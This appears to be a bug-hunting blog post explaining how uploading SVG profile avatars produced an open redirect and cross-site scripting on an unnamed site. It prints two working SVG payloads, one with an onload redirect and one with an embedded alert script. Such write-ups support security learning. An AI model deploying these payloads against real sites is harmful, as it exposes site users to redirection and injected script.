Open redirect & rXSS via profile image
Hello hackers,
In this article, I will demonstrate how I found an open redirect by uploading an SVG image as a profile avatar.
Let’s dive in.
For such a vulnerability, we would want to create an account on the target first. Then, we will go to the profile and see if we can upload an avatar to our profile. Note: check the target you are working on, and what avatar image extensions are allowed. Luckily, in my case, the target was allowing .svg images.
So I created a document image with the following code and saved it as (image.svg):
<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?>
<svg onload=”window.location=’https://google.com'"
xmlns=”http://www.w3.org/2000/svg">
<rect width=”300" height=”100" style=”fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)” />
</svg>
Head to the profile setting and upload the avatar (image.svg).
After successfully uploading the avatar, open it in a new window, and BOOM you will be directed to the location you specified in the code (in the above code I was redirected to Google).
Cross-site scripting(XSS) via profile image
Now this can be also leveraged to execute rXSS by changing the code to the following:
<svg onload=alert(document.domain)>.svg
<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<rect width=”300" height=”100" style=”fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)” />
<script type=”text/javascript”>
alert(“XSS by noor”);
</script>
</svg>
The rest of the steps are the same as the open redirect. Once you open the avatar image the alert will pop up to you!
I know this can be escalated to RCE and others, however, in my case, they did not work or maybe I did not have enough time to dig deeper into the target.
Happy hacking y’all